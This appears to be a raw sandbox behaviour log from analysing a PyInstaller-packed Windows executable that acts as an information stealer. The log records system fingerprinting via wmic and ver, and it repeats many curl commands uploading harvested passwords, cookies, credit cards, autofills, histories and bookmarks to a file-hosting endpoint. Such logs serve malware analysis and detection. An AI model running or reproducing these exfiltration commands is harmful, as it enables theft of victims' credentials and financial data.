            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73339C6FC
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333AB558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7333AB558
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKeyJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333BA7E0 cpuid 0_2_00007FF7333BA7E0
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography-44.0.0.dist-info\licenses VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\h2-4.1.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
